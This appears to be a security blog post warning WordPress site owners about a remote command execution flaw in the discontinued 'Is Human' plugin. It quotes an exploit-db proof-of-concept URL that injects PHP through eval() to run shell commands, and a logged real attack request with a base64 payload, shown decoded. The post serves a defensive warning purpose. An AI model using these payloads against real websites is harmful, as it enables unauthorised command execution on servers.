Just because something isn’t readily available anymore doesn’t necessarily mean that someone isn’t out there searching for it.Take the “Is Human” WordPress plugin, for example.
It’s no longer available for download, no longer supported by its developers, and yet cybercriminals are still scanning websites hoping that someone still has it installed.
Why? Because versions 1.4.2 and earlier suffer from a remote command execution vulnerability. Below is a write-up from the corresponding exploit-db entry:
The vulnerability exists in /is-human/engine.php.
It is possible to take control of the eval() function via the 'type' parameter, when the 'action' is set to log-reset. From here we can run out own code.
In order to avoid any errors we point the $is_hum->get_* array variable into $is_hum->get_ih and to close the execution without error we point it to php stored function error_log(). In between we may place our own php code and use the passthru() function to execute commands.
Execution running the linux whoami command:
http://server/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();passthru(whoami);error
We recently experienced attempts to exploit said vulnerability on our website, all of which failed because we don't use this plugin - not to mention they used the incorrect filepath. All attempts originated from the same (U.S.-based) IP address:
/blog/2013/02/01/hackers-still-scanning-for-vulnerable-timthumb-scripts/wp-content/plugins/is-human/engine.php?action=log-reset&error&eval(base64_decode(JHM9cGhwX3VuYW1lKCk7Cm
VjaG8gJzxicj4nLiRzOwoKZWNobyAnPGJyPic7CnBh
c3N0aHJ1KGlkKTsK))&type=ih_options()
The base64_ decoded text is:
$s=php_uname();
echo '<br>'.$s;
echo '<br>';
passthru(id);
Obviously this post serves as a warning to anyone that may still have this plugin installed on their WordPress website. Cybercriminals will attempt to exploit any vulnerability – old or new – to cause mischief and mayhem.
WordPress is a popular CMS, and it’s important that anyone running it keeps the platform and any installed plugins up-to-date.
Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet, “Like” us on Facebook or add us to your circle on Google+.
No comments:
Post a Comment